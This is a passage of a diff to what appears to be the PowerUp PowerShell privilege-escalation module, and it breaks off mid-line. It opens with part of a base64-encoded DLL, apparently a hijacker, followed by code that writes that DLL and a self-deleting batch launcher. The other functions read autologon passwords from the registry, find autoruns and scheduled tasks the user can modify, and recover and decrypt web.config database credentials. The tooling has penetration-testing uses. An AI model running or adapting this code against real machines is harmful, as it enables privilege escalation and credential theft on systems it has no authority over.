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"
 
-    if($PSBoundParameters['Architecture']) {
+    if ($PSBoundParameters['Architecture']) {
         $TargetArchitecture = $Architecture
     }
-    elseif($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {
+    elseif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {
         $TargetArchitecture = 'x64'
     }
     else {
         $TargetArchitecture = 'x86'
     }
 
-    if($TargetArchitecture -eq 'x64') {
+    if ($TargetArchitecture -eq 'x64') {
         [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64)
     }
     else {
         [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)
     }
 
-    if($PSBoundParameters['BatPath']) {
+    if ($PSBoundParameters['BatPath']) {
         $TargetBatPath = $BatPath
     }
     else {
@@ -2673,7 +3364,6 @@ function Write-HijackDll {
     'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath
 
     Write-Verbose ".bat launcher written to: $TargetBatPath"
-
     Set-Content -Value $DllBytes -Encoding Byte -Path $DllPath
     Write-Verbose "$TargetArchitecture DLL Hijacker written to: $DllPath"
 
@@ -2682,6 +3372,7 @@ function Write-HijackDll {
     $Out | Add-Member Noteproperty 'Architecture' $TargetArchitecture
     $Out | Add-Member Noteproperty 'BatLauncherPath' $TargetBatPath
     $Out | Add-Member Noteproperty 'Command' $BatCommand
+    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL')
     $Out
 }
 
@@ -2694,90 +3385,110 @@ function Write-HijackDll {
 
 function Get-RegistryAlwaysInstallElevated {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Checks if any of the AlwaysInstallElevated registry keys are set.
+Checks if any of the AlwaysInstallElevated registry keys are set.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
-        or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
-        are set, $False otherwise. If one of these keys are set, then all .MSI files run with
-        elevated permissions, regardless of current user permissions.
+.DESCRIPTION
 
-    .EXAMPLE
+Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
+or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys
+are set, $False otherwise. If one of these keys are set, then all .MSI files run with
+elevated permissions, regardless of current user permissions.
 
-        PS C:\> Get-RegistryAlwaysInstallElevated
+.EXAMPLE
+
+Get-RegistryAlwaysInstallElevated
+
+Returns $True if any of the AlwaysInstallElevated registry keys are set.
+
+.OUTPUTS
+
+System.Boolean
 
-        Returns $True if any of the AlwaysInstallElevated registry keys are set.
+$True if RegistryAlwaysInstallElevated is set, $False otherwise.
 #>
 
+    [OutputType('System.Boolean')]
     [CmdletBinding()]
     Param()
 
     $OrigError = $ErrorActionPreference
-    $ErrorActionPreference = "SilentlyContinue"
+    $ErrorActionPreference = 'SilentlyContinue'
 
-    if (Test-Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer") {
+    if (Test-Path 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer') {
 
-        $HKLMval = (Get-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
+        $HKLMval = (Get-ItemProperty -Path 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
         Write-Verbose "HKLMval: $($HKLMval.AlwaysInstallElevated)"
 
         if ($HKLMval.AlwaysInstallElevated -and ($HKLMval.AlwaysInstallElevated -ne 0)){
 
-            $HKCUval = (Get-ItemProperty -Path "HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
+            $HKCUval = (Get-ItemProperty -Path 'HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)
             Write-Verbose "HKCUval: $($HKCUval.AlwaysInstallElevated)"
 
             if ($HKCUval.AlwaysInstallElevated -and ($HKCUval.AlwaysInstallElevated -ne 0)){
-                Write-Verbose "AlwaysInstallElevated enabled on this machine!"
+                Write-Verbose 'AlwaysInstallElevated enabled on this machine!'
                 $True
             }
             else{
-                Write-Verbose "AlwaysInstallElevated not enabled on this machine."
+                Write-Verbose 'AlwaysInstallElevated not enabled on this machine.'
                 $False
             }
         }
         else{
-            Write-Verbose "AlwaysInstallElevated not enabled on this machine."
+            Write-Verbose 'AlwaysInstallElevated not enabled on this machine.'
             $False
         }
     }
     else{
-        Write-Verbose "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer does not exist"
+        Write-Verbose 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer does not exist'
         $False
     }
-
     $ErrorActionPreference = $OrigError
 }
 
 
 function Get-RegistryAutoLogon {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Finds any autologon credentials left in the registry.
 
-        Finds any autologon credentials left in the registry.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .DESCRIPTION
+.DESCRIPTION
+
+Checks if any autologon accounts/credentials are set in a number of registry locations.
+If they are, the credentials are extracted and returned as a custom PSObject.
+
+.EXAMPLE
+
+Get-RegistryAutoLogon
 
-        Checks if any autologon accounts/credentials are set in a number of registry locations.
-        If they are, the credentials are extracted and returned as a custom PSObject.
+Finds any autologon credentials left in the registry.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-RegistryAutoLogon
+PowerUp.RegistryAutoLogon
 
-        Finds any autologon credentials left in the registry.
+Custom PSObject containing autologin credentials found in the registry.
 
-    .LINK
+.LINK
 
-        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb
 #>
 
+    [OutputType('PowerUp.RegistryAutoLogon')]
     [CmdletBinding()]
     Param()
 
     $AutoAdminLogon = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -ErrorAction SilentlyContinue)
-
     Write-Verbose "AutoAdminLogon key: $($AutoAdminLogon.AutoAdminLogon)"
 
     if ($AutoAdminLogon -and ($AutoAdminLogon.AutoAdminLogon -ne 0)) {
@@ -2797,6 +3508,7 @@ function Get-RegistryAutoLogon {
             $Out | Add-Member Noteproperty 'AltDefaultDomainName' $AltDefaultDomainName
             $Out | Add-Member Noteproperty 'AltDefaultUserName' $AltDefaultUserName
             $Out | Add-Member Noteproperty 'AltDefaultPassword' $AltDefaultPassword
+            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.RegistryAutoLogon')
             $Out
         }
     }
@@ -2804,24 +3516,36 @@ function Get-RegistryAutoLogon {
 
 function Get-ModifiableRegistryAutoRun {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns any elevated system autoruns in which the current user can
+modify part of the path string.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ModifiablePath  
+
+.DESCRIPTION
+
+Enumerates a number of autorun specifications in HKLM and filters any
+autoruns through Get-ModifiablePath, returning any file/config locations
+in the found path strings that the current user can modify.
 
-        Returns any elevated system autoruns in which the current user can
-        modify part of the path string.
+.EXAMPLE
 
-    .DESCRIPTION
+Get-ModifiableRegistryAutoRun
 
-        Enumerates a number of autorun specifications in HKLM and filters any
-        autoruns through Get-ModifiablePath, returning any file/config locations
-        in the found path strings that the current user can modify.
+Return vulneable autorun binaries (or associated configs).
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-ModifiableRegistryAutoRun
+PowerUp.ModifiableRegistryAutoRun
 
-        Return vulneable autorun binaries (or associated configs).
+Custom PSObject containing results.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ModifiableRegistryAutoRun')]
     [CmdletBinding()]
     Param()
 
@@ -2852,6 +3576,7 @@ function Get-ModifiableRegistryAutoRun {
                 $Out | Add-Member Noteproperty 'Key' "$ParentPath\$Name"
                 $Out | Add-Member Noteproperty 'Path' $Path
                 $Out | Add-Member Noteproperty 'ModifiableFile' $_
+                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableRegistryAutoRun')
                 $Out
             }
         }
@@ -2869,25 +3594,37 @@ function Get-ModifiableRegistryAutoRun {
 
 function Get-ModifiableScheduledTaskFile {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns scheduled tasks where the current user can modify any file
+in the associated task action string.
 
-        Returns scheduled tasks where the current user can modify any file
-        in the associated task action string.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ModifiablePath  
+
+.DESCRIPTION
+
+Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
+and parses the XML specification for each task, extracting the command triggers.
+Each trigger string is filtered through Get-ModifiablePath, returning any file/config
+locations in the found path strings that the current user can modify.
+
+.EXAMPLE
 
-    .DESCRIPTION
+Get-ModifiableScheduledTaskFile
 
-        Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks"
-        and parses the XML specification for each task, extracting the command triggers.
-        Each trigger string is filtered through Get-ModifiablePath, returning any file/config
-        locations in the found path strings that the current user can modify.
+Return scheduled tasks with modifiable command strings.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-ModifiableScheduledTaskFile
+PowerUp.ModifiableScheduledTaskFile
 
-        Return scheduled tasks with modifiable command strings.
+Custom PSObject containing results.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ModifiableScheduledTaskFile')]
     [CmdletBinding()]
     Param()
 
@@ -2901,7 +3638,7 @@ function Get-ModifiableScheduledTaskFile {
         try {
             $TaskName = $_.Name
             $TaskXML = [xml] (Get-Content $_.FullName)
-            if($TaskXML.Task.Triggers) {
+            if ($TaskXML.Task.Triggers) {
 
                 $TaskTrigger = $TaskXML.Task.Triggers.OuterXML
 
@@ -2911,6 +3648,7 @@ function Get-ModifiableScheduledTaskFile {
                     $Out | Add-Member Noteproperty 'TaskName' $TaskName
                     $Out | Add-Member Noteproperty 'TaskFilePath' $_
                     $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile')
                     $Out
                 }
 
@@ -2920,6 +3658,7 @@ function Get-ModifiableScheduledTaskFile {
                     $Out | Add-Member Noteproperty 'TaskName' $TaskName
                     $Out | Add-Member Noteproperty 'TaskFilePath' $_
                     $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile')
                     $Out
                 }
             }
@@ -2928,29 +3667,43 @@ function Get-ModifiableScheduledTaskFile {
             Write-Verbose "Error: $_"
         }
     }
-
     $ErrorActionPreference = $OrigError
 }
 
 
 function Get-UnattendedInstallFile {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Checks several locations for remaining unattended installation files,
-        which may have deployment credentials.
+Checks several locations for remaining unattended installation files,
+which may have deployment credentials.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.EXAMPLE
 
-    .EXAMPLE
+Get-UnattendedInstallFile
 
-        PS C:\> Get-UnattendedInstallFile
+Finds any remaining unattended installation files.
 
-        Finds any remaining unattended installation files.
+.LINK
 
-    .LINK
+http://www.fuzzysecurity.com/tutorials/16.html
 
-        http://www.fuzzysecurity.com/tutorials/16.html
+.OUTPUTS
+
+PowerUp.UnattendedInstallFile
+
+Custom PSObject containing results.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.UnattendedInstallFile')]
+    [CmdletBinding()]
+    Param()
+
     $OrigError = $ErrorActionPreference
     $ErrorActionPreference = "SilentlyContinue"
 
@@ -2969,6 +3722,7 @@ function Get-UnattendedInstallFile {
     $SearchLocations | Where-Object { Test-Path $_ } | ForEach-Object {
         $Out = New-Object PSObject
         $Out | Add-Member Noteproperty 'UnattendPath' $_
+        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnattendedInstallFile')
         $Out
     }
 
@@ -2978,74 +3732,89 @@ function Get-UnattendedInstallFile {
 
 function Get-WebConfig {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+This script will recover cleartext and encrypted connection strings from all web.config
+files on the system. Also, it will decrypt them if needed.
+
+Author: Scott Sutherland, Antti Rantasaari  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
 
-        This script will recover cleartext and encrypted connection strings from all web.config
-        files on the system.  Also, it will decrypt them if needed.
+This script will identify all of the web.config files on the system and recover the
+connection strings used to support authentication to backend databases.  If needed, the
+script will also decrypt the connection strings on the fly.  The output supports the
+pipeline which can be used to convert all of the results into a pretty table by piping
+to format-table.
 
-        Author: Scott Sutherland - 2014, NetSPI
-        Author: Antti Rantasaari - 2014, NetSPI
+.EXAMPLE
 
-    .DESCRIPTION
+Return a list of cleartext and decrypted connect strings from web.config files.
 
-        This script will identify all of the web.config files on the system and recover the
-        connection strings used to support authentication to backend databases.  If needed, the
-        script will also decrypt the connection strings on the fly.  The output supports the
-        pipeline which can be used to convert all of the results into a pretty table by piping
-        to format-table.
+Get-WebConfig
 
-    .EXAMPLE
+user   : s1admin
+pass   : s1password
+dbserv : 192.168.1.103\server1
+vdir   : C:\test2
+path   : C:\test2\web.config
+encr   : No
 
-        Return a list of cleartext and decrypted connect strings from web.config files.
+user   : s1user
+pass   : s1password
+dbserv : 192.168.1.103\server1
+vdir   : C:\inetpub\wwwroot
+path   : C:\inetpub\wwwroot\web.config
+encr   : Yes
 
-        PS C:\> Get-WebConfig
-        user   : s1admin
-        pass   : s1password
-        dbserv : 192.168.1.103\server1
-        vdir   : C:\test2
-        path   : C:\test2\web.config
-        encr   : No
+.EXAMPLE
 
-        user   : s1user
-        pass   : s1password
-        dbserv : 192.168.1.103\server1
-        vdir   : C:\inetpub\wwwroot
-        path   : C:\inetpub\wwwroot\web.config
-        encr   : Yes
+Return a list of clear text and decrypted connect strings from web.config files.
 
-    .EXAMPLE
+Get-WebConfig | Format-Table -Autosize
 
-        Return a list of clear text and decrypted connect strings from web.config files.
+user    pass       dbserv                vdir               path                          encr
+----    ----       ------                ----               ----                          ----
+s1admin s1password 192.168.1.101\server1 C:\App1            C:\App1\web.config            No
+s1user  s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No
+s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\test\web.config       No
+s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\web.config            Yes
+s3user  s3password 192.168.1.103\server3 D:\App3            D:\App3\web.config            No
 
-        PS C:\>get-webconfig | Format-Table -Autosize
+.OUTPUTS
 
-        user    pass       dbserv                vdir               path                          encr
-        ----    ----       ------                ----               ----                          ----
-        s1admin s1password 192.168.1.101\server1 C:\App1            C:\App1\web.config            No  
-        s1user  s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No  
-        s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\test\web.config       No  
-        s2user  s2password 192.168.1.102\server2 C:\App2            C:\App2\web.config            Yes 
-        s3user  s3password 192.168.1.103\server3 D:\App3            D:\App3\web.config            No 
+System.Boolean
 
-     .LINK
+System.Data.DataTable
 
-        https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
-        http://www.netspi.com
-        https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx
-        http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
-        http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx
+.LINK
 
-     .NOTES
+https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx
+
+.NOTES
 
-        Below is an alterantive method for grabbing connection strings, but it doesn't support decryption.
-        for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings
+Below is an alterantive method for grabbing connection strings, but it doesn't support decryption.
+for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings
+
+Author: Scott Sutherland - 2014, NetSPI
+Author: Antti Rantasaari - 2014, NetSPI
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
+    [OutputType('System.Boolean')]
+    [OutputType('System.Data.DataTable')]
     [CmdletBinding()]
     Param()
 
     $OrigError = $ErrorActionPreference
-    $ErrorActionPreference = "SilentlyContinue"
+    $ErrorActionPreference = 'SilentlyContinue'
 
     # Check if appcmd.exe exists
     if (Test-Path  ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
@@ -3054,15 +3823,15 @@ function Get-WebConfig {
         $DataTable = New-Object System.Data.DataTable
 
         # Create and name columns in the data table
-        $Null = $DataTable.Columns.Add("user")
-        $Null = $DataTable.Columns.Add("pass")
-        $Null = $DataTable.Columns.Add("dbserv")
-        $Null = $DataTable.Columns.Add("vdir")
-        $Null = $DataTable.Columns.Add("path")
-        $Null = $DataTable.Columns.Add("encr")
+        $Null = $DataTable.Columns.Add('user')
+        $Null = $DataTable.Columns.Add('pass')
+        $Null = $DataTable.Columns.Add('dbserv')
+        $Null = $DataTable.Columns.Add('vdir')
+        $Null = $DataTable.Columns.Add('path')
+        $Null = $DataTable.Columns.Add('encr')
 
         # Get list of virtual directories in IIS
-        C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath | 
